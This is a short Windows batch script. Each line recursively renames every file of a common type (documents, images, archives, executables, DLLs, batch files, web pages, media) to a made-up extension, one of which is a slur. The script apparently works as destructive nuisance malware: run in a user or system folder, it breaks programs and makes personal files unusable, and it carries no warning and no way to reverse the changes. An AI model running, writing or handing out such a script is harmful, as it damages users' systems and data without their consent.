for /r %%x in (*.txt) do ren "%%x" *.bin
for /r %%x in (*.cfg) do ren "%%x" *.amtlib
for /r %%x in (*.jpg) do ren "%%x" *.cue
for /r %%x in (*.png) do ren "%%x" *.fag
for /r %%x in (*.psd) do ren "%%x" *.photoshop
for /r %%x in (*.zip) do ren "%%x" *.tarGz
for /r %%x in (*.tar) do ren "%%x" *.rlib
for /r %%x in (*.zipx) do ren "%%x" *.xyive
for /r %%x in (*.7z) do ren "%%x" *.7core
for /r %%x in (*.xz) do ren "%%x" *.banklib
for /r %%x in (*.wim) do ren "%%x" *.bankcache
for /r %%x in (*.bzip2) do ren "%%x" *.salsa
for /r %%x in (*.gzip) do ren "%%x" *.chipZ
for /r %%x in (*.reg) do ren "%%x" *.windows
for /r %%x in (*.exe) do ren "%%x" *.execlib
for /r %%x in (*.bat) do ren "%%x" *.winalias
for /r %%x in (*.key) do ren "%%x" *.unlocker
for /r %%x in (*.html) do ren "%%x" *.webmain
for /r %%x in (*.css) do ren "%%x" *.webcounter
for /r %%x in (*.download) do ren "%%x" *.webresource
for /r %%x in (*.dll) do ren "%%x" *.dynamic
for /r %%x in (*.ico) do ren "%%x" *.winico
for /r %%x in (*.icon) do ren "%%x" *.winicx
for /r %%x in (*.htm) do ren "%%x" *.webmainline
for /r %%x in (*.bills) do ren "%%x" *.housebills
for /r %%x in (*.nfo) do ren "%%x" *.nonlinear
for /r %%x in (*.mp4) do ren "%%x" *.linearfilm
for /r %%x in (*.avi) do ren "%%x" *.nonlinearfilm
for /r %%x in (*.mp3) do ren "%%x" *.nonlinearaudio
for /r %%x in (*.flac) do ren "%%x" *.losslessaudio
for /r %%x in (*.veg) do ren "%%x" *.vegasmain
for /r %%x in (*.aep) do ren "%%x" *.afterfxmain
for /r %%x in (*.ai) do ren "%%x" *.illustratormain
for /r %%x in (*.bak) do ren "%%x" *.prebakups
for /r %%x in (*.xml) do ren "%%x" *.xenia
for /r %%x in (*.log) do ren "%%x" *.syslogs
for /r %%x in (*.rar) do ren "%%x" *.oldzip
for /r %%x in (*.pak) do ren "%%x" *.pakaged
for /r %%x in (*.cab) do ren "%%x" *.caboose
for /r %%x in (*.ver) do ren "%%x" *.versioninglib
for /r %%x in (*.var) do ren "%%x" *.convars
for /r %%x in (*.rtf) do ren "%%x" *.richest
for /r %%x in (*.ahk) do ren "%%x" *.autoed
for /r %%x in (*.pbpx) do ren "%%x" *.paquette
for /r %%x in (*.bmp) do ren "%%x" *.bitmaps
for /r %%x in (*.chm) do ren "%%x" *.mipmaps
for /r %%x in (*.ini) do ren "%%x" *.sysregl
for /r %%x in (*.mhtml) do ren "%%x" *.websecondary